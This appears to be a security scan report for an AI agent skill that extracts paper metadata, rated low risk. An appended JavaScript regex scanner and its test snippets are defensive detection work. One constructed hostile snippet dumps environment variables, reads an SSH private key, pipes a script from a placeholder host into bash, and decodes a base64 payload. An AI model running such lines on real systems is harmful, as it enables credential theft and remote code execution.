Trusted: risk score 5/100
Last scanned: 2 days ago
paper-cluster-survey-v2-2
Extract structured paper records from PDFs and URLs, then classify and write academic survey reviews
A legitimate academic paper extraction and survey generation skill with appropriate, documented capabilities and no malicious behavior detected.
Skill name: paper-cluster-survey-v2-2
Analysis time: 38.4s
Engine: pi
Verdict: can be installed
Approve for use. This skill performs standard paper metadata extraction from PDFs and URLs using well-defined, documented methods.

Security findings: 1 item

Severity | Finding | Location
Low | Shell tool usage not explicitly documented in SKILL.md | SKILL.md:68
SKILL.md mentions bundled scripts for paper extraction but does not enumerate the external tools (pdftotext, mutool, python3 with pypdf, strings) that the scripts invoke for PDF text extraction. This is a documentation gap rather than a security violation: the tools are standard, well-known utilities. The practical consequence is that a reviewer cannot tell from SKILL.md alone which binaries the skill expects to find on the host.
Evidence: SKILL.md references 'scripts/extract-paper-records.mjs' without specifying PDF tool dependencies
→ Consider adding a 'Tool Dependencies' section listing pdftotext, mutool, python3 with the pypdf module, and strings
Resource type | Declared permission | Inferred permission | Status | Evidence
File system | READ | READ | ✓ consistent | scripts/extract-paper-records.mjs:179 reads local files via fs.readFileSync
Network access | READ | READ | ✓ consistent | scripts/extract-paper-records.mjs:247 uses native fetch() to retrieve paper URLs
Command execution | WRITE | WRITE | ✓ consistent | scripts/extract-paper-records.mjs:194-225 invokes pdftotext, mutool, python3, st…
External URLs: 1 finding
Medium | External URL | https://arxiv.org/abs/1234.5678 | README.md:30
Note: arXiv identifiers have the form YYMM.NNNNN, and "1234" is not a valid year-month, so this is a placeholder reference in README.md rather than a live source.

Directory structure

10 files · 37.6 KB · 1320 lines
JavaScript: 3 files, 792 lines · Markdown: 6 files, 522 lines · YAML: 1 file, 6 lines
├─ 📁 agents
│ └─ 📋 openai.yaml YAML 6L · 360 B
├─ 📁 references
│ ├─ 📝 extraction-pipeline.md Markdown 48L · 1.4 KB
│ ├─ 📝 output-schema.md Markdown 107L · 1.8 KB
│ ├─ 📝 review-paper-style.md Markdown 81L · 2.1 KB
│ └─ 📝 taxonomy-guidelines.md Markdown 35L · 1.1 KB
├─ 📁 scripts
│ ├─ 📜 extract-paper-records.mjs JavaScript 492L · 14.3 KB
│ ├─ 📜 normalize-sources.mjs JavaScript 138L · 3.1 KB
│ └─ 📜 render-formal-review-template.mjs JavaScript 162L · 4.1 KB
├─ 📝 README.md Markdown 99L · 3.1 KB
└─ 📝 SKILL.md Markdown 152L · 6.1 KB

Dependency analysis: 1 item

Package | Version | Source | Known vulnerabilities | Notes
Node.js built-ins | N/A | runtime | | Uses only built-in modules: fs, os, path, process, child_process (spawnSync), fetch (native)

Security highlights

✓ No credential harvesting or environment variable enumeration
✓ No network exfiltration or data transmission to external servers beyond source URLs
✓ No access to sensitive paths (~/.ssh, ~/.aws, .env)
✓ No obfuscation techniques (base64, eval, atob)
✓ No remote script execution (curl|bash, wget|sh)
✓ No arbitrary shell command execution - only specific PDF extraction tools
✓ Uses only Node.js built-in modules, no external dependencies
✓ Shell commands are standard, well-known utilities (pdftotext, mutool, strings)
✓ All shell invocations are confined to the bundled scripts that SKILL.md references (the specific tools are not enumerated there; see the finding above)
✓ Temporary PDF files are properly cleaned up after processing
✓ No privilege escalation attempts
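The highlights above are the kind of source-level checks a reviewer runs before trusting the permission table. As an added illustration (this is not the scanner's engine, and the rule names and regular expressions are this page's own assumptions), the block below implements those checks as a regex triage pass over JavaScript source and runs it on two constructed snippets: one written the way the report describes the skill (spawnSync with an argument array, fs.readFileSync, native fetch), which produces no findings, and one hostile snippet that trips every rule exactly once.

```javascript
// Added example, not the scanner's own code: a heuristic triage pass that
// implements the checks listed under "Security highlights" as regexes over
// source lines. Rule names and patterns are assumptions made for this page.
const RULES = [
  // Enumerating the whole environment is the usual first step of credential theft.
  { id: "env-enumeration", re: /(Object\.(keys|entries)|JSON\.stringify)\(\s*process\.env\s*\)/ },
  // Key material and dotenv files; "process.env" itself is not matched.
  { id: "sensitive-path", re: /\.(ssh|aws)\b|(^|[\/'"])\.env\b/ },
  // Runtime code construction or decoding: eval(), new Function(), atob().
  { id: "dynamic-code", re: /\b(eval|Function|atob)\s*\(/ },
  // Piping a downloaded script straight into a shell.
  { id: "remote-exec", re: /\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b/ },
  // exec()/execSync() take a shell string; shell:true makes spawn do the same.
  { id: "shell-string", re: /\bexec(Sync)?\s*\(|shell\s*:\s*true/ },
  // A long quoted base64 run is a common way to hide a payload or URL.
  { id: "base64-blob", re: /['"`][A-Za-z0-9+\/]{40,}={0,2}['"`]/ },
];

// Returns one finding per (line, rule) hit; an empty list means no rule fired.
function scanSource(src) {
  const findings = [];
  src.split("\n").forEach((line, i) => {
    for (const rule of RULES) {
      if (rule.re.test(line)) findings.push({ rule: rule.id, line: i + 1, text: line.trim() });
    }
  });
  return findings;
}

// Constructed snippet in the style the report describes: argv array, local
// file read, native fetch. Expected result: no findings.
const BENIGN = [
  'import { spawnSync } from "node:child_process";',
  'import { readFileSync } from "node:fs";',
  'const pdf = readFileSync(localPath);',
  'const r = spawnSync("pdftotext", ["-layout", file, "-"], { encoding: "utf8" });',
  'const res = await fetch(paperUrl);',
].join("\n");

// Constructed hostile snippet (not taken from any real skill): each line trips
// one or two rules, six findings in total.
const HOSTILE = [
  'const secrets = JSON.stringify(process.env);',
  'const key = fs.readFileSync(os.homedir() + "/.ssh/id_ed25519");',
  'exec("curl -s https://example.invalid/x.sh | bash");',
  'const payload = atob("' + "QUJD".repeat(12) + '");',
].join("\n");

// Convenience wrapper: rule ids that fired, sorted, for a quick comparison.
function firedRules(src) {
  return [...new Set(scanSource(src).map((f) => f.rule))].sort();
}
```

Heuristics like these produce false positives (any 40-character base64 string, any property that happens to be named `.aws`), so the output is a triage list to read against the code, not a verdict; the permission table above is the complementary step of confirming what each flagged call actually does with its inputs.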